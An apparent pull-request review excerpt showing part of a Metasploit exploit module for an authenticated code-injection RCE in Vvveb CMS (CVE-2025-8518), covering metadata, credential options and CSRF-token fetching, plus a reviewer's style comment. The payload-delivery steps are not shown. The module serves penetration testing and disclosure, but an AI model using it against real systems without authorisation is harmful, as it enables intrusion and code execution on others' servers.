modules/exploits/multi/http/vvveb_auth_rce_cve_2025_8518.rb

```diff
@@ -0,0 +1,247 @@
+        'Description' => %q{
+          Vvveb CMS is vulnerable to Code Injection via the Code Editor functionality.
+
+          Unsanitized editing functionality allows attacker-controlled changes to existing files on the web-accessible filesystem,
+          allowing remote authenticated attackers with access to the Code Editor to achieve code execution
+          when those modified files are executed or served by the application or web server.
+
+          This vulnerability affects Vvveb CMS versions up to and including 1.0.5.
+          Successful exploitation may result in the remote code execution under the privileges
+          of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+          An attacker can execute arbitrary system commands in the context of the user running the web server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Hamed Kohi' # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2025-8518'],
+          ['URL', 'https://hkohi.ca/vulnerability/8']
+        ],
+        'Platform' => ['php'],
+        'Arch' => [ARCH_PHP],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP
+              # Tested with php/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to Vvveb CMS', '/admin/']),
+        OptString.new('USERNAME', [true, 'The username used to authenticate to Vvveb CMS', 'admin']),
+        OptString.new('PASSWORD', [true, 'The password used to authenticate to Vvveb CMS', ''])
+      ]
+    )
+  end
+
+  def get_csrf_token
+    print_status('Fetching CSRF token...')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+
+    html = res.get_html_document
+    csrf_input = html.at('input[name="csrf"]')
+    unless csrf_input
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+    end
+
+    token = csrf_input.attributes.fetch('value', nil)
+    if token.blank?
+      fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
+    end
+
+    print_good("Token successfully fetched: #{token}")
+    return token.to_s
```

Comment:
No need to have `return` keyword here
```suggestion
    token.to_s
```